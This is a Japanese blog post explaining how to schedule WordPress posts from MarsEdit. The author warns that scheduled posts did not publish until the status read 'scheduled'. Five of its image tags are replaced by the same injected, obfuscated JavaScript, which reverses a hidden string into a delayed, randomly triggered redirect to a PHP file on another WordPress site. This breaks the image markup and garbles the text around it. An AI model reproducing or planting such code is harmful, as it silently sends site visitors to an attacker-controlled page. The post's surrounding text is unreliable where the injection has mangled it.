MacBook Air, MarsEdit, 日刊すみれぽ

MarsEditの予約投稿は注意!ステータスが「予約済み」になるまで油断しないで!

512x512bb$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”256″ height=”256″>

MacではMarsEditを使っているすみれ(@sumire20120524)です。 MarsEditでも予約投稿したいなぁと思って探してみたら、ありました!

先に言っておきます。

重大なことが判明しました!

Worpdressから見て、予約投稿を押さないと指定の時間になっても投稿されていませんでした。泣

やり方はこれから説明しますが、最後に「予約投稿」をポチッとおして、ステータスが予約済みになるのを確認してください!!

これをやらないと、私の場合はいつまでも投稿されませんでした。

方法がわかったのはいいけど、それじゃあ意味ないような気もしますが・・・。

予約投稿する方法

メニューのPost>Edit Dateを選択します。

スクリーンショット 2017 02 09 10 54 37$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”326″ height=”135″> 日付をセットします。 スクリーンショット 2017 02 09 10 55 35$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”162″ height=”51″>

下書きにして投稿

右下のServer OptionsのPost Statusを「Draft」にしてから、左上の「Send to Blog」を選択します。

スクリーンショット 2017 02 09 10 56 05$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”326″ height=”416″>

確認

WordPressの管理画面から確認してみましょう。 ちゃんと予約投稿になっているようです。

スクリーンショット 2017 02 09 11 03 36$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”630″ height=”167″>

何度も言いますが、最後にこの予約投稿を選択して、ステータスが予約済みになっていることを確認してください。

念のため、その時間になったらブログの更新も確認したほうがよさそうですね。

まとめ

いま調べてみたら、アクセス数によって自動投稿されているっぽいことが書いてありました。ということは、アクセス数がないと投稿されないってこと…?

するぷろとかだとちゃんと指定時間になったら投稿されるんだけどなぁ。

コメントを残す

メールアドレスが公開されることはありません。